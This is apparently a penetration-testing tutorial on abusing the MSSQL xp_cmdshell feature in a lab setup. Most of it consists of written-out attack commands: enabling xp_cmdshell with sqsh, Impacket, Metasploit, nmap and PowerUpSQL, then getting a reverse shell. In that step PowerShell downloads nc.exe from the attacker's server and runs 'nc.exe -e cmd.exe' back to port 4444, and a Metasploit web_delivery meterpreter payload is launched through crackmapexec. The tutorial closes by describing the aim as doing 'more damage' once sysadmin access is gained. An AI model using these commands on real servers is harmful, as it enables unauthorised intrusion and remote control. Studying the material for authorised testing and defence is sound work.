MSSQL for Pentester: Command Execution with xp_cmdshell
Today’s article is the third article in the series of MSSQL Server and its penetration Testing. In this article, we will be discovering and exploiting the security aspects of the xp_cmdshell functionality.
Table of Content
- What is xp_cmdshell?
- Enabling xp_cmdshell
- Manually (GUI)
- Exploiting xp_cmdshell:
All the demonstrations in this article will be presented on the MSSQL Server. To get the MS-SQL server set up, you can refer to our article: Penetration Testing Lab Setup: MS-SQL. Previously, we have briefly discussed exploiting the xp_cmdshell functionality with the help of the Metasploit module: exploit/windows/mssql/mssql_payload in our article: MSSQL Penetration Testing with Metasploit. Although in that article, we didn’t explain the background of the xp_cmdshell functionality and its security aspect, which we will discuss.
What is xp_cmdshell?
According to the Official Microsoft Documentations, xp_cmdshell is a functionality that spawns a Windows command shell and passes in a string for execution. Any output that is generated by it is shown in the format of rows of text. To simplify, we can say that it allows the database administrators to access and execute any external process directly from the SQL Server. The implementation of the xp_cmdshell can be traced back to SQL Server 6.5. It was designed to use the SQL queries with the system command to automate various tasks that would require additional programming and working. Now that we have some knowledge about the xp_cmdshell, we can see how it can be enabled on an SQL server.
By default, the function of xp_cmdshell is disabled in the SQL server. We need to have administrator privileges to enable it. In the demonstration below, we are using the credentials of the SA user to log in on the SQL server.
Now that we have the SQL instance running as Administrator, we need to access the Object Explorer section. Here, we have the SQL Server Instance; we right-click on the instance to find a drop-down menu. We need to choose the “Facets” option from this menu, as demonstrated below:
Clicking on the Facets option will open a new window. It will have a field with the various types of facets available. We need to choose the Surface Area Configuration facets from the drop-down menu, as shown in the image below:
After choosing the surface area configuration facet, we see that we have the XPCmdShellEnabled option set as false.
Clicking on the XP command shell option, we change its value from false to true, as shown in the figure below. This way, we can enable XP command shell using the graphical user interface on a Windows MSSQL Server.
Next, we are using the sqsh tool in the kali machine. To check whether the. XP command shell option is enabled on the target machine or not. The syntax for using this tool is quite simple, first type sqsh with the -S and the Target IP address followed by -U with the username of the server admin and -P with the password for that particular user as shown in the image below.
sqsh -S 192.168.1.146 -U sa -P "Password@1" xp_cmdshell 'whoami'; go
As we can observe from the image, the SQL Server had blocked access to the procedure command shell; therefore, we will enable it now. To enable the XP command shell on the target machine using SQSH we will be running a series of commands that would first show the advanced options available within the SP configuration option. Then we will choose to execute the XP command shell option and activate it. Finally, we will run the reconfigure command that will enable the XP commercial option on the target machine, as shown in the image given below.
EXEC sp_configure 'show advanced options', 1; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; go xp_cmdshell 'whoami'; go
The activity can be verified by checking similarly to what we did with the GUI option as before.
MS SQL consists of windows services having service accounts. Whenever an instance of SQLserver is installed, a set of Windows services is also installed with unique names. Below are the SQL Server account types:
- Windows Accounts
- SQL Server Login
- DB Users
To use mssqlclient.py, we need to specify the username, domain, password, the target IP address, and the Port hosting the MSSQL service as shown in the image. here we can use the command enable_xp_cmdshell to enable command shell functionality on the target machine.
python3 mssqlclient.py WORKGROUP/sa:Password@firstname.lastname@example.org -port 1433 enable_xp_cmdshell
Again, we can verify it similarly to what we did with the GUI approach and the sqsh approach. Here we can see that we were able to enable the XP command shell functionality with the help of mssqlclient, which is a part of the Impact toolkit.
Previously, mssqlclient.py is used to connect the database through database credentials having username SA. Now we are connecting with the database by window’s user login credential.
python3 mssqlclient.py ignite:'Password@email@example.com -windows-auth enable_xp_cmdshell
As usual, Metasploit also plays its role to enable the XP command shell and helps us exploit the target and provide the session.
use exploit/windows/mssql/mssql_payload set rhosts 192.168.1.146 set password Password@1 exploit
The exploit does not stop at just enabling the XP command shell. It then runs a series of commands that can help to get us a meterpreter shell on the target machine as shown in the image below
You can use another exploit mssql_exec, which primarily enables the xp_cmd shell, and we can also set any cmd executable command. Here we set the cmd command to “ipconfig“
use auxiliary/admin/mssql/mssql_exec set rhosts 192.168.1.146 set password Password@1 set cmd "ipconfig" exploit
Here, we can use netcat to get a reverse connection on the target machine. To do so, we first need to transfer the netcat binary file to the Windows machine. For this, we will use the nc.exe executable. This file is located at /usr/share/windows-binaries. Then we can use the Python one-liner to create an HTTP service.
cd /usr/share/windows-binaries ls -al python -m SimpleHTTPServer 80
Here, the powershell.exe cmdlet invokes PowerShell and then uses the wget command to download netcat into the C:/Users/Public directory, which has access to write. Then we will use the XP command shell to execute the netcat binary to run cmd.exe. To the creating a reverse connection to the host Kali Machine on Port 4444.
xp_cmdshell "powershell.exe wget http://192.168.1.2/nc.exe -OutFile c:\\Users\Public\\nc.exe" xp_cmdshell "c:\\Users\Public\\nc.exe -e cmd.exe 192.168.1.2 4444"
In Kali Linux, we have a netcat listener on port 4444; once the PowerShell command will execute as shown in the above screenshot, we will get the shell of the target machine.
nc -lvp 4444 whoami
Another method to get a reverse connection on the target machine from the MSSQL XP command Shell functionality is by using its ability to run system commands associated with the web_delivery payload. The process is quite simple; we use the exploit/multi/script/web_delivery exploit, set the target as the Windows machine then set the payload as windows/meterpeter/reverse_tcp. Then specify the localhost. Finally, we will run the exploit command.
use exploit/multi/script/web_delivery set target 2 set payload windows/meterpreter/revese_tcp set lhost 192.168.1.2 exploit
Through the above exploit, we get the web_delivery URL, and this URL we will use in the execution of crackmapexec, command of web_delivery.
crackmapexec mssql 192.168.1.146 -u 'ignite' -p 'Password@123' -M web_delivery -o URL=http://192.168.1.2:8080/om6cxs3B
The output of the crackmapexec shows that the target has been pwned. We can go back to the Metasploit shell and find that the target has been exploited successfully, and we have a meterpreter shell on the target machine.
As we know, the XP-cmd function is disabled by default, but if we have sysadmin credentials, we can also play with the NMap script to execute the window’s commands.
nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=sa,mssql.passsword=Password@1,ms-sql-xp-cmdshell.cmd=’net user’ 192.168.1.146
First, Download the PowerUpSql from here. PowerUpSQL is a tool for Windows machines, includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation on the scale, and post-exploitation actions such as OS command execution.
We can use the Import-Module cmdlet to import the PowerShell Script. Then use the Invoke-SQLOSCmd function, which runs the OS commands via xp_cmd shell through the SQL service account.
Here, PowerUpSQL tries to connect with the database. After the connection is successful, it checks if the user credentials that we have provided are for sysadmin or the users that we have provided have sysadmin access or not. It first enables the advanced options and then tries to enable the XP command shell functionality. Here, in this demonstration, the XP commands functionality is already enabled, so the tool runs the whoami command, which shows that we are the user and nt service/MSSQL$sqlexpress user.
cd PowerUPSQL-master powershell powershell -ep bypass Import-Module .\PowerUpSQL.ps1 Invoke-SQLOSCmd -Username sa -Password Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS –Command whoami –Verbose
This article was designed to provide the users with possible content that can help them whenever they want to perform penetration testing on MSSQL Servers by exploiting XP command shell functionality. The point of this article is not to speculate on how the user can get the credentials or how they were able to elevate its sysadmin access. Instead, when or if the user could get those privileges, they can move on to extract and execute multiple commands on the target system and do more damage.